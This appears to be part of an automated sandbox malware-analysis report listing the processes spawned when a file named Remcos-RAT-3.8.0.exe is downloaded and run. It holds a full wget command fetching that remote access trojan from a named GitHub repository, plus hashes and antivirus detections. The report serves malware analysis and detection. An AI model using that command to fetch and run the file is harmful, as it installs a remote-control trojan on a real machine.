                            Commandline:C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://github.com/Ox47100/Remcos-RAT-v3.8.0/raw/refs/heads/main/Remcos-RAT-3.8.0.exe" > cmdline.out 2>&1
                            Imagebase:0x220000
                            File size:236'544 bytes
                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:low
                            Has exited:true

                            Target ID:1
                            Start time:12:02:20
                            Start date:20/03/2025
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7e2000000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:low
                            Has exited:true

                            Target ID:2
                            Start time:12:02:20
                            Start date:20/03/2025
                            Path:C:\Windows\SysWOW64\wget.exe
                            Wow64 process (32bit):true
                            Commandline:wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://github.com/Ox47100/Remcos-RAT-v3.8.0/raw/refs/heads/main/Remcos-RAT-3.8.0.exe"
                            Imagebase:0x400000
                            File size:3'895'184 bytes
                            MD5 hash:3DADB6E2ECE9C4B3E1E322E617658B60
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:low
                            Has exited:true

                            Target ID:3
                            Start time:12:02:23
                            Start date:20/03/2025
                            Path:C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe"
                            Imagebase:0x900000
                            File size:7'168 bytes
                            MD5 hash:6166F997B4BB3428AE0D9D4B4E1F0DB2
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Antivirus matches:
                            • Detection: 100%, Avira
                            • Detection: 79%, ReversingLabs
                            Reputation:low
                            Has exited:true

                            Target ID:6
                            Start time:12:02:27
                            Start date:20/03/2025
                            Path:C:\Windows\SysWOW64\WerFault.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 8472 -s 2184
                            Imagebase:0x7b0000
                            File size:483'680 bytes
                            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:low
                            Has exited:true

                            Executed Functions

                            Memory Dump Source
                            • Source File: 00000003.00000002.1400191414.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_f60000_Remcos-RAT-3.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 71673c50c8008e2fabdde567f61670a1c0c9b660a804f72ea9f9efa5a35ebc54
                            • Instruction ID: 9c7f410e55efc661b3b9ce21cd9cbe63d9382b8a4aaac5dd169120988f93ffa2
                            • Opcode Fuzzy Hash: 71673c50c8008e2fabdde567f61670a1c0c9b660a804f72ea9f9efa5a35ebc54
                            • Instruction Fuzzy Hash: 78B1B274E01218CFDB68DFA6C854B9EBBB2BF89300F2084AAD409B7265DB745D85CF10
                            Memory Dump Source
                            • Source File: 00000003.00000002.1400191414.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_f60000_Remcos-RAT-3.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 49f27e6b9187ea9e76644e7cced3de6dd73a9f49e2f84acabc43932b757492a3
                            • Instruction ID: e0219fce664fa487b477d7b1f89acdc693e0be2b15b7218eab59260f7c21148c
                            • Opcode Fuzzy Hash: 49f27e6b9187ea9e76644e7cced3de6dd73a9f49e2f84acabc43932b757492a3
                            • Instruction Fuzzy Hash: 6441B074E01228CFDB64DF64C895BAEBBB2BB46300F2044A9D919B7352DB355E81DF11
                            Memory Dump Source
                            • Source File: 00000003.00000002.1399771670.0000000000E7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E7D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_e7d000_Remcos-RAT-3.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 3aad19eb304d79420c73b4df981a7137f35d26779cd9d5f9f686e9f46a0a26a4
                            • Instruction ID: 741be0a7e07c91c52a2622140cab5de1fd5c4ed92ac9ef8f06ffb38d531a04bf
                            • Opcode Fuzzy Hash: 3aad19eb304d79420c73b4df981a7137f35d26779cd9d5f9f686e9f46a0a26a4
                            • Instruction Fuzzy Hash: 6821FF72508200EFCB15DF14D9C0B26BF75FF98324F20C569E90D1A246D336E856CAA2
                            Memory Dump Source
                            • Source File: 00000003.00000002.1399771670.0000000000E7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E7D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_e7d000_Remcos-RAT-3.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 3e58b8c56749219af83652b03aa806fca99c49847d28242aa59a8ed161806656
                            • Instruction ID: 4ba0f3287b4612cd587bc3dc2f9b064562401fa1ca84c116ab8db8435b7eeea9
                            • Opcode Fuzzy Hash: 3e58b8c56749219af83652b03aa806fca99c49847d28242aa59a8ed161806656
                            • Instruction Fuzzy Hash: 0C11D376508240DFCB15CF10D9C4B16BF72FF94324F24C5A9D8095B656D336E856CBA1